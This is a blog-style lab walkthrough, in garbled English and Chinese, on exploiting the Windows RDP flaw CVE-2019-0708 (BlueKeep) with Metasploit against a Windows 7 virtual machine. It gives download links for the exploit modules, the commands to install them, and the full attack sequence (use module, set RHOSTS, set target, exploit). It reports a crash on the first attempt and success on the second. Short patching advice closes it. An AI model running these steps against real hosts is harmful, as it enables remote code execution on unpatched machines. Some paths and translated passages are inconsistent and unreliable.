Foreword
Last month, a burst of high-risk vulnerabilities exp, follow the trend reproduce the next. . . (¯ ▽ ¯) ~ *
Brief introduction
Windows again exposed the huge destructive power of a high-risk remote vulnerability CVE-2019-0708. Once the attacker who successfully exploited this vulnerability, they could execute arbitrary code on the target system, including access to sensitive information, remote code execution, denial of service attacks and so on. And even more seriously, trigger this vulnerability without user interaction, an attacker can make comparable 2017 swept the world WannaCry like worms use this vulnerability to perform large-scale dissemination and destruction.
Sphere of influence
Note: Windows 8 and windows10 version, and later affected by this vulnerability
The conditions necessary
3389 target open ports, turn off the firewall (or 3389 release ports in the firewall policy)
surroundings
time ip 192.168.10.52
Drone win7 ip 192.168.10.55 (opened 3389, closed the firewall)
All virtual machines, use bridge mode
1, update our msf
Command line execution
apt-get update
apt-get install metasploit-framework
I updated here although there is some error but still be able to use
2, download exp
Network disk: Link: https://pan.baidu.com/s/1HTk3ehKvZYM0rh4tC0TQLg extraction code: 4dy9
After downloading the file and move it kali door into the specified location
rdp.rb into / usr / share / metasploit-framework / lib / msf / core / exploit directory
rdp_scanner.rb和cve_2019_0708_bluekeep.rb放到/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp 目录
cve_2019_0708_bluekeep_rce.r放进/usr/share/metasploit-framework/modules/exploits/windows/rdp 目录,这里需要注意如果没有rdp这个目录就去创建个。
命令(一定要把原先的文件覆盖)
cp rdp.rb /usr/share/metasploit-framework/modules/exploit/windows/rdp/rdp.rb
cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
3、更新msf的模块
先在kali中msfconsole进入metasploit
在使用reload_all加载复制过去的脚本
稍等一下即可
4、使用模块
search 0708 3是我们用到的模块
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce 使用模块
这个exp 目前只有 windwos 7 /2008r2 (我这里用的是win7旗舰版64位)
set RHOSTS 设置IP
set RPORT 设置RDP端口号
使用set target ID设置受害机机器
使用exploit开始攻击,等待建立连接
于是
set RHOSTS 192.168.10.55填写受害机
set RPORT 3389设置端口(固定)
show targets
以为我是虚拟机win7所以这里选三
set target 3
然后就exploit或run开始攻击(第一次win7蓝屏,第二次成功)
搜集的漏洞检测工具
网盘链接https://pan.baidu.com/s/1ylewLDQPwc4FuxCkm-aQlg 提取码ailu
漏洞修复:
- 及时打对应系统的安全补丁
- 关闭3389端口或添加防火墙安全策略限制对3389端口的访问
- 打不了补丁的可以开启远程桌面(网络级别身份验证(NLA)),可以临时防止漏洞攻击